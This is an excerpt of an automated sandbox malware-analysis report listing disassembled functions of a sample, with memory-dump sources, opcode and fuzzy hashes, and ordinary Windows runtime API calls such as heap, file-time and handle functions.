                                                                                                                                                                                                                                                            • Instruction ID: 275b5b68ebe631f5b405311be8789fbbdaaaa0075aa6f363818cb514755840b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD06C24B1C62AE6FB6C3B70599917D1226AFA9B55F10193CD85A8A393CE2CA8098340
                                                                                                                                                                                                                                                            Function 00007FF6404EF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                                                            • Instruction ID: ca09be03a7b31e671568cd9be017c4c4c3ddd44007bcefd41ad6f2076da691d1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C151F961B0D662E6FA28FE35940067A6281FF94BB8F144734DD6C877D5CE3CE4019760
                                                                                                                                                                                                                                                            Function 00007FF6404FB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                            • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction ID: 11897ebdb6b1aed41625d52ba5738dee62e4ce4432e9c10f9297da2409d0f1b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811C161B0CAA1D1DA10FB25A94416D6366EB45BF4F640331EEBD87BEACF3CD0508740
                                                                                                                                                                                                                                                            Function 00007FF6404F4C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404F4B49), ref: 00007FF6404F4C67
                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404F4B49), ref: 00007FF6404F4C7D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                                                            • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                                                            • Instruction ID: 47103348cb8be07dd11cd2126138cc3e2b55c2da65ebae6b84f7fd8db31b7a85
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A511A33160C6A2D1EB68BB11A45113FB7A5FB85765F501235FAADC1BD8EF2CD014DB00
                                                                                                                                                                                                                                                            Function 00007FF6404F9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                                            • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction ID: 0bccee64ff07e10a3435a72a9376a38827acb2b2b52508163820708f931c66c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9E04610F0C6A2A2FB0CBBF2A8841BA22A69F98704B004034CD1DC2391EE3C68858310
                                                                                                                                                                                                                                                            Function 00007FF6404F9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9ED6
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9EE0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                                            • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                            • Instruction ID: ce65d005f3c599956d7377c05d52b6584ab2b91f09bd573bfdf45ccabada9453
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C219621F1C662A1FE94B7A1A59037D2297DF84798F044239DA2EC77D1CF6CA841C300
                                                                                                                                                                                                                                                            Function 00007FF6404FB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 164a9401b0bfd199dc8034d016670759b34e81a86d5a64e83628a5f98765227c
                                                                                                                                                                                                                                                            • Instruction ID: 9cf5907d01376cd0e5bb6381034db65cfcb815592214ca52d8606e2caa297b7a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 164a9401b0bfd199dc8034d016670759b34e81a86d5a64e83628a5f98765227c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0441DE3290C221E7EA24BB59E95127D73AAEB56B84F140131DA9EC37D0CF3CE802C790
                                                                                                                                                                                                                                                            Function 00007FF6404E76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                                            • Opcode ID: 76e73570fa56eea7b82f0ce9b23ab017b40ede92cf2ea0af6ac7e855768810df
                                                                                                                                                                                                                                                            • Instruction ID: 79de33e144b85122254a00d928d83cc061d4d76854a3312fe009ac64147d9609
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e73570fa56eea7b82f0ce9b23ab017b40ede92cf2ea0af6ac7e855768810df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10219125B0C672A6FA10FB16A9047BAA641BF95BE4F884430EE4D87786CE7DF042C740
                                                                                                                                                                                                                                                            Function 00007FF6404FAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                            • Instruction ID: 05f3f1823e8e69add7a8ad172ae4d9fcce3b3ad2063d67eee3f14008919838cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431E461E1C6A2E2F701BB1488413BD365AAF90BA0F420135DA2DC33D2CF7CE4918721
                                                                                                                                                                                                                                                            Function 00007FF6404F8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                                            • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                            • Instruction ID: 51d733b6250d5547d370224725a845e3b5ccf9c87fdbc428cb44c683dca630a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921AE32B19756DAEB24BF64C4402EC33A9FB44328F44063ADA2C8ABC5EF38D444CB50
                                                                                                                                                                                                                                                            Function 00007FF6404F52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                            • Instruction ID: dc31aa50d951ef221e0474c8df62c83c772d02d4cbe8831db6819300e62d3fa0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A11A231E1C6A1D2EA60BF51940027EA3AABF95B84F454531EF4CD7B96CF3CE8408B54
                                                                                                                                                                                                                                                            Function 00007FF640505664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                            • Instruction ID: eedf25f2b05d0655e21498cbdec18688e9d19f6df4cd42a0092cd8ddb62cc3eb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD21C53260C68196DB65BF28D54037E72A1FB86B98F544234DA6D877D5DF3DD8008B00
                                                                                                                                                                                                                                                            Function 00007FF6404EF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                            • Instruction ID: aefa84df2ba0a0cd2fca3bf567ad65d4562a04af02d94f99f3b79dd55db81223
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7901C421A1C7A290EA04FF569900079A695FF96FE0F484631DE6C93BD6DF3CE4029340
                                                                                                                                                                                                                                                            Function 00007FF6404F720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                                                            • Instruction ID: d6133703477ad464a835fcb130d12b44d211962b92f02d38f8a58b91a197a4e1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F401DD20E0D6B3E1FEA4BBA16641579129AEF457D4F050175F96CC27C6DF3CE4404701
                                                                                                                                                                                                                                                            Function 00007FF6404F7548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
